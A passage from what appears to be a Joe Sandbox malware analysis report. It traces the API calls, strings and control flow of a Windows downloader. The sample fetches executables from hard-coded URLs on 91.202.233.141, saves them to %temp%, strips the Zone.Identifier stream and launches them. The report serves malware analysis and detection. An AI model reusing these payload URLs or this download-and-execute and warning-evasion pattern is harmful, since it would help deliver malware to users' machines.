                                              • Instruction ID: b7a307c660ba4239557350290bf6b46225e2a4b135d8d3b90c2d320efa942fa4
                                              • Opcode Fuzzy Hash: 0d273ac004c00914fe05ed54678a8cdb4758d1a0ff2002c2ae55c4392dc1fe6e
                                              • Instruction Fuzzy Hash: 1421D7B5D04318AFCB50EB94DD4BBAA7374AF04304F1441E9F51996243EB709B848FA1

                                              Non-executed Functions

                                              Function 00A312F0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 129networkfilestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00A312F9
                                              • srand.MSVCR90 ref: 00A31300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00A31320
                                              • strlen.MSVCR90 ref: 00A3132A
                                              • mbstowcs.MSVCR90 ref: 00A31341
                                              • rand.MSVCR90 ref: 00A31349
                                              • rand.MSVCR90 ref: 00A3135D
                                              • wsprintfW.USER32 ref: 00A31384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00A3139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00A313C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00A313F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 00A3142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00A3145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A3146B
                                              • wsprintfW.USER32 ref: 00A31484
                                              • DeleteFileW.KERNEL32(?), ref: 00A31494
                                              • CloseHandle.KERNEL32(000000FF), ref: 00A314B0
                                              • InternetCloseHandle.WININET(00000000), ref: 00A314BD
                                              • InternetCloseHandle.WININET(00000000), ref: 00A314CA
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 00A31395
                                              • %s:Zone.Identifier, xrefs: 00A31478
                                              • %temp%, xrefs: 00A3131B
                                              • %s\%d%d.exe, xrefs: 00A31378
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: a6566e6feff58b74d19a5ad4e6ed0cda65bba7562e282250e9eebac085d38d84
                                              • Instruction ID: 606355659ac5d1cf3bc1f463086d4211763c3a804513bd47d6218457a6e7452b
                                              • Opcode Fuzzy Hash: a6566e6feff58b74d19a5ad4e6ed0cda65bba7562e282250e9eebac085d38d84
                                              • Instruction Fuzzy Hash: F941B5B2905318ABEF24DBA0DD4AFEA7379BB88711F0445D8F609A21C1DB749B85CF50
                                              Function 00A314E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 93 a314e0-a3152b memset GetModuleHandleW 94 a31531-a31550 GetProcAddress 93->94 95 a31634 93->95 94->95 97 a31556-a31565 94->97 96 a31636-a31639 95->96 97->95 99 a3156b-a31572 97->99 100 a315d4-a315db 99->100 101 a31574-a3157b 99->101 100->95 102 a315dd-a31616 memset GetVersionExA 100->102 101->100 103 a3157d-a315b6 memset GetVersionExA 101->103 102->95 104 a31618-a31622 102->104 103->100 105 a315b8-a315c2 103->105 108 a31630-a31632 104->108 109 a31624-a3162e 104->109 106 a315d0-a315d2 105->106 107 a315c4-a315ce 105->107 106->96 107->100 107->106 108->96 109->95 109->108
                                              APIs
                                              • memset.MSVCR90 ref: 00A31501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00A31518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00A3153D
                                              • memset.MSVCR90 ref: 00A31595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 00A315AE
                                              • memset.MSVCR90 ref: 00A315F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 00A3160E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 590455813328a8c81d82bad444eb077523b07623ae9caec49c181326b4025aa7
                                              • Instruction ID: 91f9e676a21cb70aae161f8312d8fb26985e8ab822d6c9f5c0c0ea04ce3b08f2
                                              • Opcode Fuzzy Hash: 590455813328a8c81d82bad444eb077523b07623ae9caec49c181326b4025aa7
                                              • Instruction Fuzzy Hash: B7318071C4536C9BDF39CB618C4ABEAB774AB15701F0449D8F109A5190D7758F84CF91
                                              Function 00A31000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 110 a31000-a31060 memset * 2 CreateProcessW 111 a31062-a3106f Sleep 110->111 112 a31071-a31095 ShellExecuteW 110->112 113 a310a8-a310ab 111->113 114 a31097-a310a4 Sleep 112->114 115 a310a6 112->115 114->113 115->113
                                              APIs
                                              • memset.MSVCR90 ref: 00A3100E
                                              • memset.MSVCR90 ref: 00A3101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00A31057
                                              • Sleep.KERNEL32(000003E8), ref: 00A31067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00A31082
                                              • Sleep.KERNEL32(000003E8), ref: 00A3109C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: 432761a8a603e7415eb6209eacbcdf1249a3b817c6e1d79f233efcce56e3f3a7
                                              • Instruction ID: f059914a8eb5218b0354fa3e4700f8c34c5dab240a7abb53dbc7259cb125e340
                                              • Opcode Fuzzy Hash: 432761a8a603e7415eb6209eacbcdf1249a3b817c6e1d79f233efcce56e3f3a7
                                              • Instruction Fuzzy Hash: 38112E75E88348BBEB24DFD0CD46FDE7778AB15B01F200115FB09AE2C0D6B5AA448B65
                                              Function 00A31230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 116 a31230-a3125b GetLogicalDrives 117 a31266-a3126a 116->117 118 a312d6-a312e1 117->118 119 a3126c-a3128c RegOpenKeyExW 117->119 120 a312d4 119->120 121 a3128e-a312b9 RegQueryValueExW 119->121 120->117 122 a312bb-a312bf 121->122 123 a312ca-a312ce RegCloseKey 121->123 122->123 125 a312c1-a312c7 122->125 123->120 125->123
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00A31236
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00A31284
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00A312B1
                                              • RegCloseKey.ADVAPI32(?), ref: 00A312CE
                                              Strings
                                              • NoDrives, xrefs: 00A312A8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00A31277
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: bd20111c606d6e18e07cbc957a505453bd6e93976ecf7aafe063001024fc4e5f
                                              • Instruction ID: c5f375295e2bb901da49a7b002dbae477743b9f958be70ec8490b1d396da8c9f
                                              • Opcode Fuzzy Hash: bd20111c606d6e18e07cbc957a505453bd6e93976ecf7aafe063001024fc4e5f
                                              • Instruction Fuzzy Hash: A311E4B1E0420AABDF14CFD1D94ABEEBBB4BB08705F108518E611A6280D7B86A45CB91
                                              Function 00A311B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 126 a311b0-a311d6 GetDriveTypeW 127 a31225-a3122b 126->127 128 a311d8-a311df 126->128 129 a311e1-a311e8 128->129 130 a311ec-a31204 QueryDosDeviceW 128->130 129->130 131 a311ea 129->131 130->127 132 a31206-a3121c StrCmpNW 130->132 131->127 132->127 133 a3121e 132->133 133->127
                                              APIs
                                              • GetDriveTypeW.KERNEL32(00A3118F), ref: 00A311BD
                                              • QueryDosDeviceW.KERNEL32(00A3118F,?,00000208), ref: 00A311FC
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00A31214
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: a4f7d35f0c544b9bfeda76716bf63ba930c91bb4b9962d3482842d6e3b1047e6
                                              • Instruction ID: 1272ed9c3bb95eaddcaec6c68bdb199fd82368e6efa55654db3d864e06178f60
                                              • Opcode Fuzzy Hash: a4f7d35f0c544b9bfeda76716bf63ba930c91bb4b9962d3482842d6e3b1047e6
                                              • Instruction Fuzzy Hash: 7301ECB5940208ABCF64CFD5ED49BDDB7B8AB05705F0081A9BA04A6240D6349B86CF94

                                              Callgraph

                                              Executed Functions

                                              Function 003D10B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D10CA
                                              • wsprintfW.USER32 ref: 003D10E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 003D10F3
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 003D1119
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D1135
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 4b37b4e4d58abb31558f8fb25ba4673316ae086546383d09c3f3b9a0bce9e54a
                                              • Instruction ID: d687d0a9e21b2be283c5e1858cbc4950ab6b7f40556bb2806d4eaa694e0777b5
                                              • Opcode Fuzzy Hash: 4b37b4e4d58abb31558f8fb25ba4673316ae086546383d09c3f3b9a0bce9e54a
                                              • Instruction Fuzzy Hash: 210184B5940318BBD721DB60AC4AFE5733CAB44700F4045A5A715911D1D6B05F858BA6
                                              Function 003D16A0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 66sleepstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 003D16AE
                                                • Part of subcall function 003D10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D10CA
                                                • Part of subcall function 003D10B0: wsprintfW.USER32 ref: 003D10E3
                                                • Part of subcall function 003D10B0: PathFileExistsW.KERNELBASE(?), ref: 003D10F3
                                                • Part of subcall function 003D1230: GetLogicalDrives.KERNEL32 ref: 003D1236
                                                • Part of subcall function 003D1230: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 003D1284
                                                • Part of subcall function 003D1230: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 003D12B1
                                                • Part of subcall function 003D1230: RegCloseKey.ADVAPI32(?), ref: 003D12CE
                                              • wsprintfA.USER32 ref: 003D1755
                                              • strcmp.MSVCR90 ref: 003D176A
                                                • Part of subcall function 003D1150: lstrcpyW.KERNEL32(?,?), ref: 003D11A3
                                              Strings
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 003D1776
                                              • http://91.202.233.141/lksrv.exe, xrefs: 003D178F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 2a328331203939afccd496ce6c3a138921a48f04071b83235531daf9b5de18e2
                                              • Instruction ID: 7e4083138a8911ba010e70e40918f179ad2cb2e06304f2382a66b9752d692135
                                              • Opcode Fuzzy Hash: 2a328331203939afccd496ce6c3a138921a48f04071b83235531daf9b5de18e2
                                              • Instruction Fuzzy Hash: 6E2195B6D00318BBDB22EBA4FC8A7AA7374AF00344F1441DBE51996353DA719F849F52

                                              Non-executed Functions

                                              Function 003D12F0 Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 129networkfilestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 003D12F9
                                              • srand.MSVCR90 ref: 003D1300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D1320
                                              • strlen.MSVCR90 ref: 003D132A
                                              • mbstowcs.MSVCR90 ref: 003D1341
                                              • rand.MSVCR90 ref: 003D1349
                                              • rand.MSVCR90 ref: 003D135D
                                              • wsprintfW.USER32 ref: 003D1384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 003D139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 003D13C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003D13F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 003D142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 003D145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D146B
                                              • wsprintfW.USER32 ref: 003D1484
                                              • DeleteFileW.KERNEL32(?), ref: 003D1494
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D14B0
                                              • InternetCloseHandle.WININET(00000000), ref: 003D14BD
                                              • InternetCloseHandle.WININET(00000000), ref: 003D14CA
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 003D1395
                                              • %s\%d%d.exe, xrefs: 003D1378
                                              • %temp%, xrefs: 003D131B
                                              • %s:Zone.Identifier, xrefs: 003D1478
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: 352e1a405b6d36ca1677057be56224c09b6728855b460e8fb0b1ca6edcc065ed
                                              • Instruction ID: f7419ba606f69b74e3a232f89eabe2c78c42b9c882f36e76e80afe391d97fd64
                                              • Opcode Fuzzy Hash: 352e1a405b6d36ca1677057be56224c09b6728855b460e8fb0b1ca6edcc065ed
                                              • Instruction Fuzzy Hash: A741A9B2D02314BBE721EB60EC4AFDA737DAB88701F04459AF209A6191DB749F84CF51
                                              Function 003D14E0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 93 3d14e0-3d152b memset GetModuleHandleW 94 3d1634 93->94 95 3d1531-3d1550 GetProcAddress 93->95 96 3d1636-3d1639 94->96 95->94 97 3d1556-3d1565 95->97 97->94 99 3d156b-3d1572 97->99 100 3d15d4-3d15db 99->100 101 3d1574-3d157b 99->101 100->94 102 3d15dd-3d1616 memset GetVersionExA 100->102 101->100 103 3d157d-3d15b6 memset GetVersionExA 101->103 102->94 104 3d1618-3d1622 102->104 103->100 105 3d15b8-3d15c2 103->105 106 3d1624-3d162e 104->106 107 3d1630-3d1632 104->107 108 3d15c4-3d15ce 105->108 109 3d15d0-3d15d2 105->109 106->94 106->107 107->96 108->100 108->109 109->96
                                              APIs
                                              • memset.MSVCR90 ref: 003D1501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 003D1518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 003D153D
                                              • memset.MSVCR90 ref: 003D1595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 003D15AE
                                              • memset.MSVCR90 ref: 003D15F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 003D160E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 1de6171384e7d50bda61018b377e1e132db42d590fa26c52bcfc451bb1842b38
                                              • Instruction ID: 41ef8922d63a9b71e1535fdf28d8ffca38c27bbc1b6054615c9b82387899b250
                                              • Opcode Fuzzy Hash: 1de6171384e7d50bda61018b377e1e132db42d590fa26c52bcfc451bb1842b38
                                              • Instruction Fuzzy Hash: DD318472C4522CABDF36CB20EC4ABE9B775AB15700F0845DAE50965281D775CF84CF91
                                              Function 003D1000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 110 3d1000-3d1060 memset * 2 CreateProcessW 111 3d1071-3d1095 ShellExecuteW 110->111 112 3d1062-3d106f Sleep 110->112 114 3d1097-3d10a4 Sleep 111->114 115 3d10a6 111->115 113 3d10a8-3d10ab 112->113 114->113 115->113
                                              APIs
                                              • memset.MSVCR90 ref: 003D100E
                                              • memset.MSVCR90 ref: 003D101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 003D1057
                                              • Sleep.KERNEL32(000003E8), ref: 003D1067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 003D1082
                                              • Sleep.KERNEL32(000003E8), ref: 003D109C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: a250bd34cfcfec9ae7435778a574ae6fe827746a1b39aacf1328f1817ebd7221
                                              • Instruction ID: 39553f5bdb9de22323c0d173cb423b59f393c4f86153d4569017344bc47f73ea
                                              • Opcode Fuzzy Hash: a250bd34cfcfec9ae7435778a574ae6fe827746a1b39aacf1328f1817ebd7221
                                              • Instruction Fuzzy Hash: CC1133B6E84308BBEB11DF90EC46FDE7778AB14B01F100116FA096E2C0D6B1AE44C766
                                              Function 003D1230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 116 3d1230-3d125b GetLogicalDrives 117 3d1266-3d126a 116->117 118 3d126c-3d128c RegOpenKeyExW 117->118 119 3d12d6-3d12e1 117->119 120 3d128e-3d12b9 RegQueryValueExW 118->120 121 3d12d4 118->121 122 3d12bb-3d12bf 120->122 123 3d12ca-3d12ce RegCloseKey 120->123 121->117 122->123 125 3d12c1-3d12c7 122->125 123->121 125->123
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 003D1236
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 003D1284
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 003D12B1
                                              • RegCloseKey.ADVAPI32(?), ref: 003D12CE
                                              Strings
                                              • NoDrives, xrefs: 003D12A8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 003D1277
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 6c068af36bea7033a1b628a24b413aeee7874281f53a3c0361630a1894315b58
                                              • Instruction ID: 129c020dc857abc58c5949ab6e32bc05a2ac793384a6b36e2b8de28159feb7fd
                                              • Opcode Fuzzy Hash: 6c068af36bea7033a1b628a24b413aeee7874281f53a3c0361630a1894315b58
                                              • Instruction Fuzzy Hash: 4A11DA71E4120AEBDB11CFD1E949BEEBBB8FB48704F10850AE511A7280D7796A45CF91
                                              Function 003D11B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 126 3d11b0-3d11d6 GetDriveTypeW 127 3d11d8-3d11df 126->127 128 3d1225-3d122b 126->128 129 3d11ec-3d1204 QueryDosDeviceW 127->129 130 3d11e1-3d11e8 127->130 129->128 132 3d1206-3d121c StrCmpNW 129->132 130->129 131 3d11ea 130->131 131->128 132->128 133 3d121e 132->133 133->128
                                              APIs
                                              • GetDriveTypeW.KERNEL32(003D118F), ref: 003D11BD
                                              • QueryDosDeviceW.KERNEL32(003D118F,?,00000208), ref: 003D11FC
